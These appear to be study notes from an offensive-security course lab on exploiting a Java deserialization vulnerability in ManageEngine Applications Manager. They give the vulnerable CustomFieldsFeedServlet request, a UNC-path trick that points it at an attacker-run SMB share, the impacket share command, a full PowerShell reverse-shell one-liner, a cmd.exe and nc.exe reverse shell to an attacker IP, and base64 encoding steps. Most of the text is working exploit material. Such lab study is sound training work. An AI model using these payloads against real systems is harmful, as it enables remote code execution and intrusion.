8.4
Although we have not discussed Java deserialization vulnerabilities in this course, it is worth mentioning that one such vulnerability exists in the ManageEngine Applications Manager instance in your lab. We encourage you to get familiar with ysoserial, the Java deserialization payload generator, and try to identify and exploit this vulnerability.
- Search the code base for readObject or Serializable, e.g.:
  java.util.HashMap today = (java.util.HashMap)ois.readObject();
- Find the request location:
POST /servlet/CustomFieldsFeedServlet?customFieldObject=\\\\192.168.119.135\\AWAE\\exploit HTTP/1.1
Host: 192.168.135.113:8443
Cookie: JSESSIONID_APM_9090=DD2EA485CD9594E5E6013D1DC3123987; testcookie=; am_username=; am_check=
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close
Content-Length: 0
- customFieldObject is used as a file name:
  fileName = request.getParameter("customFieldObject");
- On Windows this accepts a UNC path, so it can point at a remote SMB share that we control; the servlet then deserializes whatever object file it reads from there.
- Create a share (the directory ~/AWAE/Share is exposed as the share named awae):
  python3 /usr/share/doc/python3-impacket/examples/smbserver.py awae ~/AWAE/Share
- Use either a powershell.exe payload or cmd.exe + nc.exe as the command for the serialized ysoserial object (the IP and port must be your own listener):
  $client = New-Object System.Net.Sockets.TCPClient('192.168.119.120',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};
  cmd.exe /c \\\\192.168.119.135\\awae\\nc.exe 192.168.119.135 9000 -e cmd.exe
  (copy the binary into the share first: cp /usr/share/windows-binaries/nc.exe ~/AWAE/Share/)
- Encode the PowerShell payload as UTF-16LE base64 for -EncodedCommand; passed as plain text, the one-liner's quotes, pipes and braces are mangled on the way through the serialized command and the reverse shell may never connect back:
  iconv -f ASCII -t UTF-16LE shell.txt | base64 | tr -d "\n"
  powershell -EncodedCommand [result_for_iconv]
